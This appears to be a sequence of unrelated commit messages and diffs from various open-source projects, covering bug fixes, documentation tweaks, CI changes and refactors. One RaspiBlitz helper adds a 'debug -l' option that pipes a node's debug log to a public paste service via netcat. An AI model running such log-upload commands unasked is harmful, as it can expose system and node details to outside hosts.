fix -O / PYTHONOPTIMIZE bug fixes I'm not sure how to write test cases for PYTHONOPTIMIZE=1 (without growing our whole test matrix), so I'm leaving this untested...
@@ -898,7 +898,8 @@ def tracers_to_jaxpr(
   def newvar(t: JaxprTracer) -> Var:
     var = gensym(type_substitute(t.aval))
-    assert t_to_var.setdefault(id(t), var) is var
+    var_ = t_to_var.setdefault(id(t), var)
+    assert var is var_
     return var
 
   def type_substitute(aval: AbstractValue) -> AbstractValue:
added message before logged values # Conflicts: # pype/plugins/global/publish/integrate_new.py
@@ -812,7 +812,9 @@ class IntegrateAssetNew(pyblish.api.InstancePlugin):
         matching_profiles = {}
         highest_value = -1
-        self.log.info(self.template_name_profiles)
+        self.log.debug(
+            "Template name profiles:\n{}".format(self.template_name_profiles)
+        )
         for name, filters in self.template_name_profiles.items():
             value = 0
             families = filters.get("families")
Fix a servicemanager race condition. We can't call 'cleanup' from two different threads at the same time.
@@ -47,6 +47,7 @@ class SubprocessServiceManager(ServiceManager): shutdownTimeout=None, logLevelName="INFO", metricUpdateInterval=2.0 ): + self.cleanupLock = threading.Lock() self.host = host self.port = port self.storageDir = storageDir @@ -149,22 +150,33 @@ class SubprocessServiceManager(ServiceManager): self.serviceProcesses = {} def cleanup(self): - for identity, workerProcess in list(self.serviceProcesses.items()): + with self.cleanupLock: + with self.lock: + toCheck = list(self.serviceProcesses.items()) + + for identity, workerProcess in toCheck: if workerProcess.poll() is not None: workerProcess.wait() + with self.lock: + if identity in self.serviceProcesses: del self.serviceProcesses[identity] + with self.lock: + toCheck = list(self.serviceProcesses.items()) + with self.db.view(): - for identity in list(self.serviceProcesses): + for identity, workerProcess in toCheck: serviceInstance = service_schema.ServiceInstance.fromIdentity(identity) if (not serviceInstance.exists() or (serviceInstance.shouldShutdown and time.time() - serviceInstance.shutdownTimestamp > self.shutdownTimeout)): - workerProcess = self.serviceProcesses.get(identity) if workerProcess: workerProcess.terminate() workerProcess.wait() + + with self.lock: + if identity in self.serviceProcesses: del self.serviceProcesses[identity] self.cleanupOldLogfiles()
admin server: test that "GET /admin" gets to the admin app This exercises
@@ -60,3 +60,18 @@ def test_get(test_client, url, mimetype, is_editable):
     assert resp.mimetype == mimetype
     data = b"".join(resp.get_app_iter(flask.request.environ)).decode("utf-8")
     assert ("/admin/edit?" in data) == is_editable
+
+
+def test_get_admin_does_something_useful(test_client, mocker):
+    # Test that GET /admin eventually gets to the admin JS app
+    # See https://github.com/lektor/lektor/issues/1043
+    render_template = mocker.patch(
+        "lektor.admin.modules.dash.render_template",
+        return_value="RENDERED",
+    )
+    resp = test_client.get("/admin", follow_redirects=True)
+    assert resp.status_code == 200
+    assert resp.get_data(as_text=True) == render_template.return_value
+    assert render_template.mock_calls == [
+        mocker.call("dash.html", lektor_config=mocker.ANY),
+    ]
hide software version in sidebar RTD uses weird versions, so we handle this ourselves
@@ -95,10 +95,9 @@ body {
   text-decoration: none;
 }
 
-/* software version in sidebar */
+/* hide software version in sidebar */
 .wy-side-nav-search > div.version {
-  color: #D63E29;
-  font-size: 90%;
+  font-size: 0;
 }
 
 .wy-breadcrumbs {
fixed LogSigmoid math string that wasn't rendering in documentation Summary: The documentation for LogSigmoid says: > Applies the element-wise function: > \<blank\> Now the documentation properly displays the math string. Pull Request resolved:
@@ -559,7 +559,8 @@ class LeakyReLU(Module):
 class LogSigmoid(Module):
     r"""Applies the element-wise function:
 
-    .. math:`\text{LogSigmoid}(x) = \log\left(\frac{ 1 }{ 1 + \exp(-x)}\right)`
+    .. math::
+        \text{LogSigmoid}(x) = \log\left(\frac{ 1 }{ 1 + \exp(-x)}\right)
 
     Shape:
         - Input: :math:`(N, *)` where `*` means, any number of additional
llvm: Use full component name for function name This includes component type for named components.
@@ -1182,7 +1182,7 @@ class Component(object, metaclass=ComponentsMeta):
             ctx.get_input_struct_type(self).as_pointer(),
             ctx.get_output_struct_type(self).as_pointer()))
 
-        func_name = ctx.get_unique_name(self.name)
+        func_name = ctx.get_unique_name(str(self))
         llvm_func = pnlvm.ir.Function(ctx.module, func_ty, name=func_name)
         llvm_func.attributes.add('argmemonly')
         llvm_func.attributes.add('alwaysinline')
fix request verification add descriptions & outputs
@@ -685,7 +685,7 @@ script: return replaceInTemplates(currentCommand.template, args); } - function sendRequest(tmpl, reqArgs, resStatus) { + function sendRequest(tmpl, reqArgs, resStatusPath) { var readyBody = replaceInTemplates(tmpl, reqArgs); var httpParams = { Method: 'POST', @@ -702,15 +702,17 @@ script: if (res.StatusCode < 200 || res.StatusCode >= 300) { throw 'Got status code ' + res.StatusCode + ' from EWS with body ' + res.Body + ' with headers ' + JSON.stringify(res.Headers); } - resStatus = dq(raw, currentCommand.resStatus); + var bdy = res.Body.replace(/&#x.*?;/g, ""); + var raw = JSON.parse(x2j(bdy)); + + var resStatus = dq(raw, resStatusPath); if (!Array.isArray(resStatus)) { resStatus = [resStatus]; } if (resStatus[0] !== 'Success') { throw 'Got EWS error ' + resStatus + ' from EWS with body ' + res.Body + ' with headers ' + JSON.stringify(res.Headers); } - var bdy = res.Body.replace(/&#x.*?;/g, ""); - var raw = JSON.parse(x2j(bdy)); + return raw; } @@ -1187,6 +1189,8 @@ script: - name: max-entries-returned description: Stop querying after specified number is reached outputs: + - contextPath: EWS.SearchItems.ID + description: Mail ID - contextPath: EWS.SearchItems.Created description: Time where the element was created - contextPath: EWS.SearchItems.Sent @@ -1237,6 +1241,7 @@ script: description: Searchable mail display name - contextPath: EWS.Mailboxes.ReferenceId description: Reference ID of the mail box, for further use on other ews queries + description: Retrieve a list of mailboxes that could be searched - name: ews-search-mailboxes arguments: - name: filter @@ -1286,6 +1291,21 @@ script: - name: ews-find-folders arguments: - name: target-mailbox + description: The mailbox to search in + outputs: + - contextPath: EWS.Folders.ChildFolderCount + description: Folder child folder count + - contextPath: EWS.Folders.DisplayName + description: Folder display name + - contextPath: EWS.Folders.TotalCount + description: Folder total count + - contextPath: EWS.Folders.UnreadCount + description: Folder unread count + - contextPath: EWS.Folders.FolderID.ID + description: Folder id + - contextPath: EWS.Folders.FolderID.ChangeKey + description: Folder change key + description: Get all folder from a mailbox located under the root folder - name: ews-get-attachment-item arguments: - name: attachment-id
hide_alexa_from_mp * hide_alexa_from_mp pack integration is deprecated, no need to have the pack in the mp * Update pack_metadata.json add comma
"name": "Alexa Rank Indicator (Deprecated)", "description": "Deprecated. Vendor has declared end of life for this product. No available replacement.", "support": "xsoar", + "hidden": true, "currentVersion": "2.0.23", "author": "Cortex XSOAR", "url": "https://www.paloaltonetworks.com/cortex",
Fix handling of embedded shared libs on Windows TN:
@@ -40,13 +40,39 @@ _so_ext = { 'darwin': 'dylib', }.get(sys.platform, 'so') +# Loading the shared library here is quite involved as we want to support +# Python packages that embed all the required shared libraries: if we can +# find the shared library in the package directory, import it from there +# directly. + +# Directory that contains this __init__.py module _self_path = os.path.dirname(os.path.abspath(__file__)) + +# Base and full names for the shared library to load. Full name assumes the +# shared lib is in the package directory. _c_lib_name = 'lib${c_api.shared_object_basename}.{}'.format(_so_ext) _c_lib_path = os.path.join(_self_path, _c_lib_name) -if not os.path.exists(_c_lib_path): + +# If we can find the shared lirbray in the package directory, load it from +# here, otherwise let the dynamic loader find it in the environment. On +# Windows, there is no RPATH trick, so we need to temporarily alter the PATH +# environment variable in order to import the whole closure of DLLs. +_old_env_path = None +if os.path.exists(_c_lib_path): + if sys.platform == 'win32': + _old_env_path = os.environ['PATH'] + os.environ['PATH'] = '{}{}{}'.format(_self_path, os.path.pathsep, + os.environ['PATH']) +else: _c_lib_path = _c_lib_name + +# Finally load the library _c_lib = ctypes.cdll.LoadLibrary(_c_lib_path) +# Restore the PATH environment variable if we altered it +if _old_env_path is not None: + os.environ['PATH'] = _old_env_path + def _import_func(name, argtypes, restype, exc_wrap=True): """
fix AI-PEP path error Summary: Pull Request resolved: as title
@@ -3,14 +3,11 @@ from __future__ import division from __future__ import print_function from __future__ import unicode_literals -import importlib -import os from benchmarks.operator_benchmark import benchmark_runner +from benchmarks.operator_benchmark.ops import ( # noqa + add_test, # noqa + matmul_test) # noqa + if __name__ == "__main__": - # TODO: current way of importing other tests are fragile, so we need to have a robust way - for module in os.listdir(os.path.dirname(__file__)): - if module == '__init__.py' or not module.endswith('_test.py'): - continue - importlib.import_module("benchmarks.operator_benchmark.ops." + module[:-3]) benchmark_runner.main()
Add __repr__, __eq__, and example() to point mass This commit adds the following methods to PointMass class: * __repr__ - representative method; * __eq__ - comparison method; * point_mass_example() - to run some doctests.
@@ -26,6 +26,8 @@ class PointMass(Element): Mass for the element on the x direction. my: float, optional Mass for the element on the y direction. + tag: str + A tag to name the element Examples -------- @@ -54,6 +56,51 @@ class PointMass(Element): def __hash__(self): return hash(self.tag) + def __eq__(self, other): + """This function allows point mass elements to be compared. + Parameters + ---------- + other : obj + parameter for comparasion + + Returns + ------- + True if other is equal to the reference parameter. + False if not. + + Example + ------- + >>> pointmass1 = point_mass_example() + >>> pointmass2 = point_mass_example() + >>> pointmass1 == pointmass2 + True + """ + if self.__dict__ == other.__dict__: + return True + else: + return False + + def __repr__(self): + """This function returns a string representation of a point mass + element. + Parameters + ---------- + + Returns + ------- + A string representation of a bearing object. + Examples + -------- + >>> point_mass = point_mass_example() + >>> point_mass + PointMass(n=0, mx=1.0, my=2.0, tag='pointmass') + """ + return ( + f"{self.__class__.__name__}" + f"(n={self.n}, mx={self.mx:{0}.{5}}," + f" my={self.my:{0}.{5}}, tag={self.tag!r})" + ) + def M(self): """Mass matrix.""" mx = self.mx @@ -191,3 +238,28 @@ class PointMass(Element): hover.mode = "mouse" return hover + + +def point_mass_example(): + """This function returns an instance of a simple point mass. + The purpose is to make available a simple model + so that doctest can be written using it. + + Parameters + ---------- + + Returns + ------- + An instance of a point mass object. + + Examples + -------- + >>> pointmass = point_mass_example() + >>> pointmass.mx + 1.0 + """ + n = 0 + mx = 1.0 + my = 2.0 + point_mass = PointMass(n=n, mx=mx, my=my, tag="pointmass") + return point_mass
fix: check parts length before get match Fixes bugs which made it impossible to modify fields such as `type`.
@@ -264,7 +264,7 @@ def update(_doc_cls=None, **update):
             op = operator_map.get(op, op)
 
         match = None
-        if parts[-1] in COMPARISON_OPERATORS:
+        if len(parts) > 1 and parts[-1] in COMPARISON_OPERATORS:
             match = parts.pop()
 
         # Allow to escape operator-like field name by __
Update README.md Update badges with new data location at
@@ -18,9 +18,9 @@ Click here to [![badge](https://img.shields.io/badge/launch-Pangeo%20binder-579A
 
 ![Profile count](https://img.shields.io/endpoint?label=Number%20of%20Argo%20profiles%3A&style=social&url=https%3A%2F%2Fmap.argo-france.fr%2Fdata%2FARGOFULL.json)
 
-![Erddap status](https://img.shields.io/endpoint?url=https%3A%2F%2Fraw.githubusercontent.com%2Feuroargodev%2Fargopy%2Fapi-status%2Fargopy%2Fassets%2Fargopy_api_status_erddap.json)
+![Erddap status](https://img.shields.io/endpoint?url=https://raw.githubusercontent.com/euroargodev/argopy-status/master/argopy_api_status_erddap.json)
 
-![Argovis status](https://img.shields.io/endpoint?url=https%3A%2F%2Fraw.githubusercontent.com%2Feuroargodev%2Fargopy%2Fapi-status%2Fargopy%2Fassets%2Fargopy_api_status_argovis.json)
+![Argovis status](https://img.shields.io/endpoint?url=https://raw.githubusercontent.com/euroargodev/argopy-status/master/argopy_api_status_argovis.json)
 
 ## Install
Update Browser-2.1.0.rst Fix mistyped word.
@@ -42,7 +42,7 @@ Most important enhancements
 Use Playwright video to allow recording video of the test execution. (`#148`_)
 ------------------------------------------------------------------------------
 Playwright has supported creating video for few releases. Now the library has been
-enhanced to support videa creation in New Context keyword. If video is enabled in
+enhanced to support video creation in New Context keyword. If video is enabled in
 the context, new page will create a video.
 
 Improve library logging when waiting. (`#491`_)
Breaking changes in plotting to make interface cleaner Instead of specifying x axis in plot1d, now specify (optionally) the overlay axis. Makes the interface more like plotgrid.
@@ -534,6 +534,9 @@ class Hist(object):
     def sparse_axes(self):
         return [ax for ax in self._axes if isinstance(ax, SparseAxis)]
 
+    def sparse_nbins(self):
+        return len(self._sumw)
+
     def _idense(self, axis):
         return self.dense_axes().index(axis)
Updated installation process added step to include conda-forge channel
@@ -10,6 +10,11 @@ After Anaconda has been installed, open up the terminal (Unix) or Anaconda promp
    conda create --name nilmtk-env
    ```
 
+2. Add conda-forge to list of channels to be searched for packages.
+   ```bash
+   conda config --add channels conda-forge
+   ```
+
 2. Activate the new *nilmtk-env* environment.
 
    ```bash
Remove python36 windows environment from core in GA Github actions doesn't support python36 environment for windows anymore.
@@ -26,7 +26,7 @@ jobs: fail-fast: false matrix: name: [ - "windows-py36", + # "windows-py36", no support anymore for the package "windows-py37", "windows-py38", "windows-py39", @@ -43,9 +43,6 @@ jobs: ] include: - - name: "windows-py36" - python: "3.6" - os: windows-latest - name: "windows-py37" python: "3.7" os: windows-latest @@ -67,9 +64,6 @@ jobs: - name: "ubuntu-py39" python: "3.9" os: ubuntu-latest - # - name: "macos-py36" - # python: "3.6" - # os: macos-latest - name: "macos-py37" python: "3.7" os: macos-latest
Add a note about non-included custom mappings [#OSF-8559]
<ul> <li>custom name: the new name for the subject</li> <li>custom parent: the parent of the subject. Leave blank if it is a toplevel subject. - *Note*: if adding a new child of an existing bepress parent, you must also add a 'custom' parent with the same name that maps to the existing - bepress subject. See JSON below for an example. + *Note*: if adding a new child of an existing bepress parent that hasn't already been included, you must also add a 'custom' parent with the same name that maps to the existing + bepress subject. See JSON below for an example. This is only necessary because "Engineering" wasn't explicitly included. </li> <li>bepress: the existing subject that you would like to repalce with the subject listed in the custom name field.</li> </ul>
Fix sac_agent debug summary bug w/ entropy. SAC is usually used with a TransformedDistribution for the actor distribution, which does not have an analytic entropy.
@@ -438,9 +438,12 @@ class SacAgent(tf_agent.TFAgent):
       elif isinstance(action_distribution, tfp.distributions.Categorical):
         common.generate_tensor_summaries(
             'act_mode', action_distribution.mode(), self.train_step_counter)
-      common.generate_tensor_summaries('entropy_raw_action',
+      try:
+        common.generate_tensor_summaries('entropy_action',
                                        action_distribution.entropy(),
                                        self.train_step_counter)
+      except NotImplementedError:
+        pass  # Some distributions do not have an analytic entropy.
 
     return actor_loss
Change K calculation Change K calculation as proposed by HaukeWittich in
@@ -750,7 +750,7 @@ class ShaftElement(Element):
             [L*k8, 0, 0, L**2*k9, -L*k8, 0, 0, L**2*k9],
         ])
 
-        K = E * Ie_l / (105 * L ** 3 * (1 + phi) ** 2) * (K1 + 105 * phi * K2 * A / A_l)
+        K = E * L**(-3) * (1 + phi)**(-2) * (K1 * Ie_l/105 + K2 * self.Ie * phi * A_l / A)
 
         # axial force
         k10 = 36 + 60 * phi + 30 * phi ** 2
Fix the git URL regex which may incorrectly match a Windows path as git URL E.g. c:/temp/pytest-of-Screamer/pytest-8/test_import_after_add_git1_0/test3.git
@@ -105,7 +105,7 @@ regex_local_ref = r'^([\w.+-][\w./+-]*?)/?(?:#(.*))?$'
 regex_url_ref = r'^(.*/([\w.+-]+)(?:\.\w+)?)/?(?:#(.*))?$'
 
 # git url (no #rev)
-regex_git_url = r'^(git\://|ssh\://|https?\://|)(([^/:@]+)(\:([^/:@]+))?@)?([^/:]+)[:/](.+?)(\.git|\/?)$'
+regex_git_url = r'^(git\://|ssh\://|https?\://|)(([^/:@]+)(\:([^/:@]+))?@)?([^/:]{3,})[:/](.+?)(\.git|\/?)$'
 
 # hg url (no #rev)
 regex_hg_url = r'^(file|ssh|https?)://([^/:]+)/([^/]+)/?([^/]+?)?$'
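A quick, hand-rolled check (not part of the commit) of what the tightened host group `[^/:]{3,}` changes, using the Windows path from the commit message and an assumed ordinary GitHub URL:

```python
# The single-character drive letter "c" can no longer satisfy the host group
# once the host requires at least three characters before the ':' or '/'.
import re

old = r'^(git\://|ssh\://|https?\://|)(([^/:@]+)(\:([^/:@]+))?@)?([^/:]+)[:/](.+?)(\.git|\/?)$'
new = r'^(git\://|ssh\://|https?\://|)(([^/:@]+)(\:([^/:@]+))?@)?([^/:]{3,})[:/](.+?)(\.git|\/?)$'

path = 'c:/temp/pytest-of-Screamer/pytest-8/test_import_after_add_git1_0/test3.git'
url = 'https://github.com/ARMmbed/mbed-os.git'  # illustrative URL, not from the commit

print(bool(re.match(old, path)), bool(re.match(new, path)))  # True False
print(bool(re.match(old, url)), bool(re.match(new, url)))    # True True
```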
uart_common: fix a typo Transmitted -> Transmitter
       Enabled: [1, "IDLE interrupt enabled"]
     TE:
       Disabled: [0, "Transmitter disabled"]
-      Enabled: [1, "Transmitted enabled"]
+      Enabled: [1, "Transmitter enabled"]
     RE:
       Disabled: [0, "Receiver disabled"]
       Enabled: [1, "Receiver enabled"]
Add comment about adding ':' characters into AAAA records read from TinyDNS files
@@ -47,6 +47,12 @@ class TinyDnsBaseSource(BaseSource):
     }
 
     def _data_for_AAAA(self, _type, records):
+        '''
+        TinyDNS files have the ipv6 address written in full, but with the
+        colons removed. This inserts a colon every 4th character to make
+        the address correct.
+        '''
+
         values = []
         for record in records:
             values.append(u":".join(textwrap.wrap(record[0], 4)))
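A small illustration (not from the commit) of the colon re-insertion the new docstring describes; the record value below is hypothetical:

```python
# TinyDNS stores the 32 hex digits of an IPv6 address without separators, so
# the source splits the string into 4-character groups and joins them with ':'.
import textwrap

raw = "20010db8000000000000000000000001"   # hypothetical TinyDNS AAAA value
addr = ":".join(textwrap.wrap(raw, 4))
print(addr)  # 2001:0db8:0000:0000:0000:0000:0000:0001
```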
Update README.md EOSC-Synergy SQAaaS Software Silver Badge
 [![PyPI version](https://badge.fury.io/py/udocker.svg)](https://badge.fury.io/py/udocker)
 [![Build Status](https://jenkins.eosc-synergy.eu/buildStatus/icon?job=indigo-dc%2Fudocker%2Fmaster)](https://jenkins.eosc-synergy.eu/job/indigo-dc/job/udocker/job/master/)
 
+## Achievements
+[![SQAaaS badge](https://github.com/EOSC-synergy/SQAaaS/raw/master/badges/badges_150x116/badge_software_silver.png)](https://api.eu.badgr.io/public/assertions/Ox7b5mTmS261hqn0BXnM8A "SQAaaS silver badge achieved")
+
 ![logo](docs/logo-small.png)
 
 udocker is a basic user tool to execute simple docker containers in user
Update main-flow.md Tweak : fix incorrect variable name
@@ -122,7 +122,7 @@ Anytime in the future, you can reconstruct your data NFT as an object in Python,
 from ocean_lib.models.data_nft import DataNFT
 config = <like shown elsewhere in READMEs>
 data_nft_address = <what you wrote down previously>
-data_nft = DataNFT(config, datatoken_address)
+data_nft = DataNFT(config, data_nft_address)
 ```
 
 It's similar for Datatokens. In Python:
chore: expand range to allow 2.x versions api-core, cloud-core, and resumable-media will all be releasing Python3-only 2.x versions shortly. Closes
@@ -30,10 +30,10 @@ description = "Google BigQuery API client library"
 release_status = "Development Status :: 5 - Production/Stable"
 dependencies = [
     "grpcio >= 1.38.1, < 2.0dev",  # https://github.com/googleapis/python-bigquery/issues/695
-    "google-api-core[grpc] >= 1.29.0, < 2.0.0dev",
+    "google-api-core[grpc] >= 1.29.0, < 3.0.0dev",
     "proto-plus >= 1.10.0",
-    "google-cloud-core >= 1.4.1, < 2.0dev",
-    "google-resumable-media >= 0.6.0, < 2.0dev",
+    "google-cloud-core >= 1.4.1, < 3.0dev",
+    "google-resumable-media >= 0.6.0, < 3.0dev",
     "packaging >= 14.3",
     "protobuf >= 3.12.0",
     "requests >= 2.18.0, < 3.0.0dev",
Update `pacman.py` Use widget to store parameters instead of using private variables.
@@ -12,53 +12,49 @@ import bumblebee.input import bumblebee.output import bumblebee.engine +#list of repositories the last one sould always be other +repos = ["community", "core", "extra", "other"] + class Module(bumblebee.engine.Module): def __init__(self, engine, config): super(Module, self).__init__(engine, config, bumblebee.output.Widget(full_text=self.updates) ) self._count = 0 - self._out = "" def updates(self, widget): - return self._out + return '/'.join(map(lambda x: str(widget.get(x,0)), repos)) def update(self, widgets): path = os.path.dirname(os.path.abspath(__file__)) if self._count == 0: - self._out = "?/?/?/?" try: result = bumblebee.util.execute("{}/../../bin/pacman-updates".format(path)) - self._community = 0 - self._core = 0 - self._extra = 0 - self._other = 0 + + count = len(repos)*[0] for line in result.splitlines(): if line.startswith("http"): - if "community" in line: - self._community += 1 - continue - if "core" in line: - self._core += 1; - continue - if "extra" in line: - self._extra += 1 - continue - self._other += 1 - self._out = str(self._core)+"/"+str(self._extra)+"/"+str(self._community)+"/"+str(self._other) - except RuntimeError: - self._out = "?/?/?/?" + for i in range(len(repos)-1): + if "/" + repos[i] + "/" in line: + count[i] += 1 + break + else: + result[-1] += 1 + + for i in range(len(repos)): + widgets[0].set(repos[i], count[i]) + + except BaseException as a: + raise a # TODO: improve this waiting mechanism a bit self._count += 1 self._count = 0 if self._count > 300 else self._count - def sumUpdates(self): - return self._core + self._community + self._extra + self._other - def state(self, widget): - if self.sumUpdates() > 0: + sumUpdates = sum(map(lambda x: widget.get(x,0), repos)) + if sumUpdates > 0: return "critical" # vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
SR-IOV: remove ml2_conf_sriov.ini from manual Before the doc-migration I proposed this patch: The following patch removed the ml2_conf_sriov.ini file: In order to reduce confusion, let's remove the reference to it.
@@ -271,15 +271,14 @@ Configure neutron-server (Controller)
 
          mechanism_drivers = openvswitch,sriovnicswitch
 
-#. Add the ``ml2_conf_sriov.ini`` file as parameter to the ``neutron-server``
+#. Add the ``plugin.ini`` file as a parameter to the ``neutron-server``
    service. Edit the appropriate initialization script to configure the
-   ``neutron-server`` service to load the SR-IOV configuration file:
+   ``neutron-server`` service to load the plugin configuration file:
 
    .. code-block:: bash
 
       --config-file /etc/neutron/neutron.conf
       --config-file /etc/neutron/plugin.ini
-      --config-file /etc/neutron/plugins/ml2/ml2_conf_sriov.ini
 
 #. Restart the ``neutron-server`` service.
refactor(chunks): change tostring to tobytes tostring is deprecated
@@ -151,7 +151,7 @@ def encode_compressed_segmentation_pure_python(subvol, block_size):
   return csegpy.encode_chunk(subvol.T, block_size=block_size)
 
 def encode_raw(subvol):
-  return subvol.tostring('F')
+  return subvol.tobytes('F')
 
 def encode_kempressed(subvol):
   data = 2.0 + np.swapaxes(subvol, 2,3)
[OTX-CI] extend timeout setting for the pre-merge test to 600 minutes from 360 minutes
@@ -21,7 +21,7 @@ jobs:
     runs-on: [self-hosted, linux, x64]
     steps:
       - name: Checkout repository
-        uses: actions/checkout@v2
+        uses: actions/checkout@v3
       - name: Install dependencies
         run: python -m pip install tox
       - name: Code Quality Checks
@@ -29,10 +29,11 @@ jobs:
   Pre-Merge-Tests:
     runs-on: [self-hosted, linux, x64]
     needs: Code-Quality-Checks
+    timeout-minutes: 600
     if: github.event.pull_request.draft == false
     steps:
       - name: Checkout repository
-        uses: actions/checkout@v2
+        uses: actions/checkout@v3
       - name: Install dependencies
         run: python -m pip install tox
       - name: Pre-Merge Tests
Fix - Harmony - unable to change workfile It was failing on Mac with OSError 9 Bad file descriptor and 48 Address already in use.
@@ -40,6 +40,7 @@ class Server(threading.Thread): # Create a TCP/IP socket self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # Bind the socket to the port server_address = ("127.0.0.1", port) @@ -91,7 +92,13 @@ class Server(threading.Thread): self.log.info("wait ttt") # Receive the data in small chunks and retransmit it request = None + try: header = self.connection.recv(10) + except OSError: + # could happen on MacOS + self.log.info("") + break + if len(header) == 0: # null data received, socket is closing. self.log.info(f"[{self.timestamp()}] Connection closing.")
print debug logs Blitz help menu print debug logs fully and link option. Raspiblitz help menu
# SHORTCUT COMMANDS you can call as user 'admin' from terminal -# command: raspiblitz -# calls the the raspiblitz mainmenu (legacy) -function raspiblitz() { +# command: blitz +# calls the the raspiblitz mainmenu (shortcut) +function blitz() { +if [ $# -eq 0 ] || [ "$1" = "-h" ] || [ "$1" = "-help" ] || [ "$1" = "--help" ] || [ "$1" = "help" ] ; then + echo "_commands.sh" + echo "Usage: command [options]" + echo "" + echo "Blitz commands are consolidated here." + echo "" + echo "Menu access:" + echo " raspiblitz menu" + echo " menu menu" + echo " bash menu" + echo " repair menu > repair" + echo "" + echo "Checks:" + echo " status informational Blitz status screen" + echo " sourcemode copy blockchain source modus" + echo " check check if Blitz configuration files are correct" + echo " debug print debug logs" + echo " debug -l print debug logs with bin link" + echo " patch sync scripts with latest set github and branch" + echo " github jumping directly into the options to change branch/repo/pr" + echo "" + echo "Power:" + echo " restart restart the node" + echo " off shutdown the node" + echo "" + echo "Display:" + echo " hdmi switch video output to HDMI" + echo " lcd switch video output to LCD" + echo " headless switch video output to HEADLESS" + echo "" + echo "BTC tx:" + echo " torthistx broadcast transaction through Tor to Blockstreams API and into the network" + echo " gettx retrieve transaction from mempool or blockchain and print as JSON" + echo " watchtx retrieve transaction from mempool or blockchain until certain confirmation target" + echo "" + echo "LND:" + echo " balance your satoshi balance" + echo " channels your lightning channels" + echo " fwdreport show forwarding report" + echo " manage command line tool for advanced channel management of an LND" + echo "" + echo "Users:" + echo " bos Balance of Satoshis" + echo " lit Lightning Terminal" + echo " pyblock PyBlock" + echo " chantools ChanTools" + echo " jm JoinMarket" + echo " faraday Faraday" + echo " loop Loop" + echo " pool Pool" + echo "" + echo " Extras:" + echo " whitepaper download the whitepaper from the blockchain to /home/admin/bitcoin.pdf" + echo " notifyme wrapper for blitz.notify.sh that will send a notification using the configured method and settings" + else cd /home/admin ./00raspiblitz.sh } -# command: blitz -# calls the the raspiblitz mainmenu (shortcut) -function blitz() { +# command: raspiblitz +# calls the the raspiblitz mainmenu (legacy) +function raspiblitz() { cd /home/admin ./00raspiblitz.sh } @@ -44,7 +99,12 @@ function check() { # command: debug function debug() { cd /home/admin - ./XXdebugLogs.sh + echo "Printing debug logs. Be patient, this should take maximum 2 minutes ..." + if [[ $1 = "-l" ]]; then + ./XXdebugLogs.sh > /var/cache/raspiblitz/debug.log && cat /var/cache/raspiblitz/debug.log | nc termbin.com 9999 + else + ./XXdebugLogs.sh > /var/cache/raspiblitz/debug.log && cat /var/cache/raspiblitz/debug.log + fi } # command: patch
Add Breaking Bad Quotes under the Video section; remove "API" from the description.
@@ -759,6 +759,7 @@ API | Description | Auth | HTTPS | CORS | Link | API | Description | Auth | HTTPS | CORS | Link | |---|---|---|---|---|---| | An API of Ice And Fire | Game Of Thrones API | No | Yes | Unknown | [Go!](https://anapioficeandfire.com/) | +| Breaking Bad Quotes | Some Breaking Bad quotes | No | Yes | Unknown | [Go!](https://github.com/shevabam/breaking-bad-quotes) | | Czech Television | TV programme of Czech TV | No | No | Unknown | [Go!](http://www.ceskatelevize.cz/xml/tv-program/) | | Dailymotion | Dailymotion Developer API | `OAuth` | Yes | Unknown | [Go!](https://developer.dailymotion.com/) | | Open Movie Database | Movie information | `apiKey` | Yes | Unknown | [Go!](http://www.omdbapi.com/) |
EnvBindExpr: switch to ComputingExpr TN:
@@ -10,8 +10,8 @@ from langkit.compiled_types import ( ) from langkit.diagnostics import check_source_language from langkit.expressions.base import ( - AbstractVariable, AbstractExpression, BasicExpr, CallExpr, FieldAccessExpr, - GetSymbol, LiteralExpr, NullExpr, PropertyDef, ResolvedExpression, Self, + AbstractVariable, AbstractExpression, BasicExpr, CallExpr, ComputingExpr, + FieldAccessExpr, GetSymbol, LiteralExpr, NullExpr, PropertyDef, Self, auto_attr, auto_attr_custom, construct ) from langkit.expressions.utils import array_aggr, assign_var @@ -173,16 +173,15 @@ def env_get(self, env_expr, symbol_expr, resolve_unique=False, T.root_node.entity().array_type()) -class EnvBindExpr(ResolvedExpression): +class EnvBindExpr(ComputingExpr): def __init__(self, env_expr, to_eval_expr, abstract_expr=None): self.to_eval_expr = to_eval_expr self.env_expr = env_expr - - # Declare a variable that will hold the value of the - # bound environment. self.static_type = self.to_eval_expr.type - self.env_var = PropertyDef.get().vars.create("New_Env", + + # Declare a variable that will hold the value of the bound environment + self.env_var = PropertyDef.get().vars.create('Bound_Env', LexicalEnvType) super(EnvBindExpr, self).__init__('Env_Bind_Result', @@ -211,9 +210,6 @@ class EnvBindExpr(ResolvedExpression): return '\n'.join(result) - def _render_expr(self): - return self.result_var.name - @property def subexprs(self): return {'env': self.env_expr, 'expr': self.to_eval_expr}
TST: revert breaking change to test. Clearly I missed something here.
@@ -104,7 +104,11 @@ class CannedModelsTest(TestCase): """name attribute matches model name""" for model_name in models: model = get_model(model_name) + if model.name != model_name: self.assertTrue(model.name.startswith(model_name)) + else: + self.assertEqual(model.name, model_name) + def get_sample_model_types(mod_type=None):
Allow passing of encoding-type for S3 get_bucket_versions without throwing an error. This was a change made in
@@ -764,7 +764,7 @@ class S3Backend(BaseBackend): prefix=''): bucket = self.get_bucket(bucket_name) - if any((delimiter, encoding_type, key_marker, version_id_marker)): + if any((delimiter, key_marker, version_id_marker)): raise NotImplementedError( "Called get_bucket_versions with some of delimiter, encoding_type, key_marker, version_id_marker")
try optimize=True with einsum closes can revert if this ends up problematic for some reason!
@@ -2558,7 +2558,7 @@ def tensordot(a, b, axes=2, precision=None): @_wraps(onp.einsum, lax_description=_PRECISION_DOC) def einsum(*operands, **kwargs): - optimize = kwargs.pop('optimize', 'auto') + optimize = kwargs.pop('optimize', True) optimize = 'greedy' if optimize is True else optimize precision = kwargs.pop('precision', None) if kwargs:
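A quick NumPy-level check of what the default change means; this uses plain numpy.einsum rather than the jax wrapper, and the shapes are arbitrary:

    import numpy as np

    a = np.ones((8, 16))
    b = np.ones((16, 4))
    # optimize='greedy' lets einsum pick a cheaper contraction order; the
    # numerical result matches the unoptimized evaluation.
    fast = np.einsum('ij,jk->ik', a, b, optimize='greedy')
    slow = np.einsum('ij,jk->ik', a, b, optimize=False)
    assert np.allclose(fast, slow)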
Update README.md: add Age/Gender example.
